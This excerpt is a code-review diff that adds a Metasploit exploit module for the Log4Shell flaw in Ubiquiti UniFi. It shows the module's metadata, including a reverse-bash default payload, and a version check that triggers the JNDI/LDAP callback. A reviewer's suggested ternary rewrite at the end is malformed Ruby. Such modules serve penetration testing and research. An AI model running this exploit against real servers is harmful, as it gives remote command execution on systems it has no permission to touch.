modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb

```diff
@@ -0,0 +1,155 @@
+        vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
+        deserialize a malicious Java object. This results in OS command execution.
+
+        This module will start an LDAP server that the target will need to connect to.
+      },
+      'Author' => [
+        'Spencer McIntyre', # this exploit module and JNDI/LDAP lib stuff
+        'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff
+        'Nicholas Anastasi' # Unifi research
+      ],
+      'References' => [
+        [ 'CVE', '2021-44228' ],
+        [ 'URL', 'https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi' ],
+        [ 'URL', 'https://github.com/puzzlepeaches/Log4jUnifi' ],
+        [ 'URL', 'https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1' ]
+      ],
+      'DisclosureDate' => '2021-12-09',
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => {
+        'RPORT' => 8443,
+        'SSL' => true,
+        'WfsDelay' => 30
+      },
+      'DefaultTarget' => 1,
+      'Targets' => [
+        [
+          'Windows', {
+            'Platform' => 'win'
+          },
+        ],
+        [
+          'Unix', {
+            'Platform' => 'unix',
+            'Arch' => [ARCH_CMD],
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_bash'
+            }
+          },
+        ]
+      ],
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'AKA' => ['Log4Shell', 'LogJam'],
+        'Reliability' => [REPEATABLE_SESSION]
+      }
+    )
+    register_options([
+      OptString.new('TARGETURI', [ true, 'Base path', '/'])
+    ])
+  end
+
+  def wait_until(&block)
+    datastore['WfsDelay'].times do
+      break if block.call
+
+      sleep(1)
+    end
+  end
+
+  def check
+    validate_configuration!
+    res = send_request_cgi('uri' => normalize_uri(target_uri, 'status'))
+    return Exploit::CheckCode::Unknown if res.nil?
+
+    server_version = res.get_json_document.dig('meta', 'server_version')
+    return Exploit::CheckCode::Safe unless server_version =~ /(\d+\.)+/
+
+    vprint_status("Detected version: #{server_version}")
+    server_version = Rex::Version.new(server_version)
+    if server_version < Rex::Version.new('5.13.29')
+      return Exploit::CheckCode::Safe('Versions prior to 5.13.29 are not exploitable.')
+    elsif server_version > Rex::Version.new('6.5.53')
+      return Exploit::CheckCode::Safe('Versions after 6.5.53 are patched and not affected.')
+    end
+
+    vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')
+
+    start_service
+    trigger
+
+    wait_until { @search_received }
+    return Exploit::CheckCode::Unknown unless @search_received
+
+    Exploit::CheckCode::Vulnerable
```

Comment:
```suggestion
    if @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown
```

Potential way to simplify this code using a ternary operator, provided that ternary operators wouldn't be considered confusing potential readers of this code more.